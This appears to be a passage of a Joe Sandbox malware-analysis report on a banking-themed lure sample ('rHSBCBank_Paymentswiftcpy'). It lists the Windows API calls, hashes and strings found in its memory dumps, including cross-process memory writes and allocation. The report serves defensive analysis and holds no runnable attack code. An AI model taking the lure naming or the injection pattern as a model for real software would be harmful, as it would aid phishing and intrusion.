                                                                                                                                • Opcode Fuzzy Hash: 511cf77429d5e06ffdfe38bbed13de9f9fd820f46798c03d723425e97a5671f1
                                                                                                                                • Instruction Fuzzy Hash: AA01BC76600208ABCF184FA4DC44AAA7BACEB857A1F108174FD08D6220DB39DD00DBA0
                                                                                                                                APIs
                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00785260
                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0078526E
                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00785276
                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00785280
                                                                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007852BC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                • Opcode ID: f80e939c5f4456ad9e77a2601ad7acb8a0e6df6732cf5888c442bbbb8c36a69f
                                                                                                                                • Instruction ID: 34019f878774bfe47ff2915b54c86a9a255a156bb4dad4f756b122cf719b184f
                                                                                                                                • Opcode Fuzzy Hash: f80e939c5f4456ad9e77a2601ad7acb8a0e6df6732cf5888c442bbbb8c36a69f
                                                                                                                                • Instruction Fuzzy Hash: D2015771D41A2DDBCF00EFE4E848AEDBB78FB4D311F404166E981B2140CF3859548BA5
                                                                                                                                APIs
                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00778121
                                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0077812B
                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0077813A
                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00778141
                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00778157
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 44706859-0
                                                                                                                                • Opcode ID: 77740d075ce535ec01d442c5f22ae05a24943ccb06234176cc948eb2f056d84a
                                                                                                                                • Instruction ID: 23728d51d4ab55f2f00ad92c8d6389b8b30e3302d0b1df5673957a5d63858597
                                                                                                                                • Opcode Fuzzy Hash: 77740d075ce535ec01d442c5f22ae05a24943ccb06234176cc948eb2f056d84a
                                                                                                                                • Instruction Fuzzy Hash: B4F04F71340308AFEB511FA5EC8CE673BACEF8A799B408039F949C6150CF699D41DA61
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0077C1F7
                                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0077C20E
                                                                                                                                • MessageBeep.USER32(00000000), ref: 0077C226
                                                                                                                                • KillTimer.USER32(?,0000040A), ref: 0077C242
                                                                                                                                • EndDialog.USER32(?,00000001), ref: 0077C25C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3741023627-0
                                                                                                                                • Opcode ID: 889b8297a0bbf201752c84ce0b38947acab504064e81b7edc0965364bcfbdcef
                                                                                                                                • Instruction ID: d837b2103cb137a0fa16d1ea7faaaef9edee590f4804a11789a1a9a551b29009
                                                                                                                                • Opcode Fuzzy Hash: 889b8297a0bbf201752c84ce0b38947acab504064e81b7edc0965364bcfbdcef
                                                                                                                                • Instruction Fuzzy Hash: BE01AD30404704ABEB255BA0ED4EB9677B8BB05B06F00826DE586A14E2DBE8A9448B95
                                                                                                                                APIs
                                                                                                                                • EndPath.GDI32(?), ref: 007213BF
                                                                                                                                • StrokeAndFillPath.GDI32(?,?,0075B888,00000000,?), ref: 007213DB
                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 007213EE
                                                                                                                                • DeleteObject.GDI32 ref: 00721401
                                                                                                                                • StrokePath.GDI32(?), ref: 0072141C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2625713937-0
                                                                                                                                • Opcode ID: ff63a026c3a1b2ee6712c36c1b5e6dadd0172dda41d528f5cd7c99de3b5d1c1a
                                                                                                                                • Instruction ID: 47c87bf0d984049cd908401cebe15fef5f111e8db701221d7ce1bae59505c94a
                                                                                                                                • Opcode Fuzzy Hash: ff63a026c3a1b2ee6712c36c1b5e6dadd0172dda41d528f5cd7c99de3b5d1c1a
                                                                                                                                • Instruction Fuzzy Hash: 85F01930001A8CEBDB155F66EC8C7593BA5BB5532AF58D324E469880F1C77C8995DF18
                                                                                                                                APIs
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0078C432
                                                                                                                                • CoCreateInstance.OLE32(007B2D6C,00000000,00000001,007B2BDC,?), ref: 0078C44A
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                • CoUninitialize.OLE32 ref: 0078C6B7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                • String ID: .lnk
                                                                                                                                • API String ID: 2683427295-24824748
                                                                                                                                • Opcode ID: 1ac4819ceef6a5c3bbcc529352c6d47bd30efd335b2c62fa583664f190d137d6
                                                                                                                                • Instruction ID: f20c9aca4a9b86ab4ed7e0c32630e5b15251ac0135275b39032fc3b8ea207e60
                                                                                                                                • Opcode Fuzzy Hash: 1ac4819ceef6a5c3bbcc529352c6d47bd30efd335b2c62fa583664f190d137d6
                                                                                                                                • Instruction Fuzzy Hash: 3EA17AB1204205EFD304EF54D885EABB7E8FF85314F04492DF195871A2EB75EA09CB62
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00740DB6: std::exception::exception.LIBCMT ref: 00740DEC
                                                                                                                                  • Part of subcall function 00740DB6: __CxxThrowException@8.LIBCMT ref: 00740E01
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                  • Part of subcall function 00727A51: _memmove.LIBCMT ref: 00727AAB
                                                                                                                                • __swprintf.LIBCMT ref: 00732ECD
                                                                                                                                Strings
                                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00732D66
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                • API String ID: 1943609520-557222456
                                                                                                                                • Opcode ID: 03119419182c05ec8d98b023c79efb5e06410b7b9f938de34f393718e4779140
                                                                                                                                • Instruction ID: 91efeeb922c404d1c7a4a7dbdcbc01a0db760da5a579907cf0227b967741748f
                                                                                                                                • Opcode Fuzzy Hash: 03119419182c05ec8d98b023c79efb5e06410b7b9f938de34f393718e4779140
                                                                                                                                • Instruction Fuzzy Hash: 82918C71108311DFD718EF24D88AC6EB7A8EF85710F14491DF9869B2A2EB38ED45CB52
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00724750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00724743,?,?,007237AE,?), ref: 00724770
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0078B9BB
                                                                                                                                • CoCreateInstance.OLE32(007B2D6C,00000000,00000001,007B2BDC,?), ref: 0078B9D4
                                                                                                                                • CoUninitialize.OLE32 ref: 0078B9F1
                                                                                                                                  • Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
                                                                                                                                  • Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                • String ID: .lnk
                                                                                                                                • API String ID: 2126378814-24824748
                                                                                                                                • Opcode ID: 024f704008a47bc5ba5319ae0971a36edd128561eddf4d0bee9ff4af21af0020
                                                                                                                                • Instruction ID: d9c53aba1cb8e9291e974414a0f0b7a199611715f1761740ea764b5be1ec38c0
                                                                                                                                • Opcode Fuzzy Hash: 024f704008a47bc5ba5319ae0971a36edd128561eddf4d0bee9ff4af21af0020
                                                                                                                                • Instruction Fuzzy Hash: AAA135756043119FCB14EF14C484D5ABBE5FF89324F148958F8999B3A2CB39EC45CB91
                                                                                                                                APIs
                                                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0077B4BE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ContainedObject
                                                                                                                                • String ID: AutoIt3GUI$Container$%{
                                                                                                                                • API String ID: 3565006973-901144802
                                                                                                                                • Opcode ID: b4cd40ce38eda6c675367cbe3e67ecb5d737e2f0350320311f4d927410678e4f
                                                                                                                                • Instruction ID: 5533aeddd1868ff9261802da21d8c5e2c1bed90411e734690d4a4eb6caf3940d
                                                                                                                                • Opcode Fuzzy Hash: b4cd40ce38eda6c675367cbe3e67ecb5d737e2f0350320311f4d927410678e4f
                                                                                                                                • Instruction Fuzzy Hash: 78913870600601AFDB14DF64C884B6ABBF9FF49754F24856EF94ACB291DB74E841CB60
                                                                                                                                APIs
                                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 007450AD
                                                                                                                                  • Part of subcall function 007500F0: __87except.LIBCMT ref: 0075012B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorHandling__87except__start
                                                                                                                                • String ID: pow
                                                                                                                                • API String ID: 2905807303-2276729525
                                                                                                                                • Opcode ID: 7ce5663c142ea4b16d2009411098226b1c64620c13b01f162892fdd19805b65f
                                                                                                                                • Instruction ID: d32c41f706fe54ba9369459031921ae1fbe375a67dab32ea552713205126e364
                                                                                                                                • Opcode Fuzzy Hash: 7ce5663c142ea4b16d2009411098226b1c64620c13b01f162892fdd19805b65f
                                                                                                                                • Instruction Fuzzy Hash: C2515B25908A0587DB157B24C9493BE2F94AB41701F208D5DE8D5862EBEF7C8DCCDACA
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove
                                                                                                                                • String ID: 3cs$_s
                                                                                                                                • API String ID: 4104443479-944816363
                                                                                                                                • Opcode ID: 54a36fb9f7ce09497bfc6d0e7341adf87f162c765c0814f64702f3579cc7ee11
                                                                                                                                • Instruction ID: b67e55d272d885eeb2a838595e6bacb830a9777ad3dcebcf8a787bc79f36ee8a
                                                                                                                                • Opcode Fuzzy Hash: 54a36fb9f7ce09497bfc6d0e7341adf87f162c765c0814f64702f3579cc7ee11
                                                                                                                                • Instruction Fuzzy Hash: F2516EB09006059FDF64CF68C884AAEB7F1FF44304F248629E85BD7251EB39A965CB51
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 007814BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00779296,?,?,00000034,00000800,?,00000034), ref: 007814E6
                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0077983F
                                                                                                                                  • Part of subcall function 00781487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007792C5,?,?,00000800,?,00001073,00000000,?,?), ref: 007814B1
                                                                                                                                  • Part of subcall function 007813DE: GetWindowThreadProcessId.USER32(?,?), ref: 00781409
                                                                                                                                  • Part of subcall function 007813DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0077925A,00000034,?,?,00001004,00000000,00000000), ref: 00781419
                                                                                                                                  • Part of subcall function 007813DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0077925A,00000034,?,?,00001004,00000000,00000000), ref: 0078142F
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007798AC
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007798F9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                                • Opcode ID: feda5a48ebb44feda9e7105170841c2dac42482913f13aa5008aa49709824678
                                                                                                                                • Instruction ID: 776ebfe6c95a1c9752ed44e8c325d83c8e68cbd627d1fe65483ca519c72f0564
                                                                                                                                • Opcode Fuzzy Hash: feda5a48ebb44feda9e7105170841c2dac42482913f13aa5008aa49709824678
                                                                                                                                • Instruction Fuzzy Hash: CA41507690121CBFDF10EFA4CC45ADEBBB8EB49340F108059FA49B7141DA746E45CBA1
                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007AF910,00000000,?,?,?,?), ref: 007A79DF
                                                                                                                                • GetWindowLongW.USER32 ref: 007A79FC
                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007A7A0C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Long
                                                                                                                                • String ID: SysTreeView32
                                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                                • Opcode ID: a1f65d59fe0bcfd2555ec61f95417a5bf58343012853f679c4fb8d646cbb7974
                                                                                                                                • Instruction ID: 25c2b1f120893f7479dcae4e2284a1f0836ebf34d3322e81c64df185acabd8f4
                                                                                                                                • Opcode Fuzzy Hash: a1f65d59fe0bcfd2555ec61f95417a5bf58343012853f679c4fb8d646cbb7974
                                                                                                                                • Instruction Fuzzy Hash: 4531D031204606AFDB158E78DC45BEB77A9EB8A324F208725F875922E1D738ED51CB50
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007A7461
                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007A7475
                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007A7499
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window
                                                                                                                                • String ID: SysMonthCal32
                                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                                • Opcode ID: e037f52367a93d58c547a29679937da10280d3ec71a9658fb20dbef7a75f9955
                                                                                                                                • Instruction ID: 7fa349bb2d5c70d098482a503968f3fae1d416964eeddbb7f0fcf978144dc5c6
                                                                                                                                • Opcode Fuzzy Hash: e037f52367a93d58c547a29679937da10280d3ec71a9658fb20dbef7a75f9955
                                                                                                                                • Instruction Fuzzy Hash: 4B21A132600258ABDF158FA4CC46FEA3B7AEF8D724F110214FE156B1D0DA79AC51DBA0
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007A7C4A
                                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007A7C58
                                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007A7C5F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                                • String ID: msctls_updown32
                                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                                • Opcode ID: 6da7f5c677416034bdea1e73956b8ef2deb216c56313b27a95ae977fffdcc129
                                                                                                                                • Instruction ID: 3f12e90938d8d526dd9f94f256ba706e2a6ec1617fb2120eab542bbf86f4e819
                                                                                                                                • Opcode Fuzzy Hash: 6da7f5c677416034bdea1e73956b8ef2deb216c56313b27a95ae977fffdcc129
                                                                                                                                • Instruction Fuzzy Hash: B6219CB5600208AFEB14DF24DCC1CB637ACEB9A364B144159FA009B3A1CB39EC11CAB0
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007A6D3B
                                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007A6D4B
                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007A6D70
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
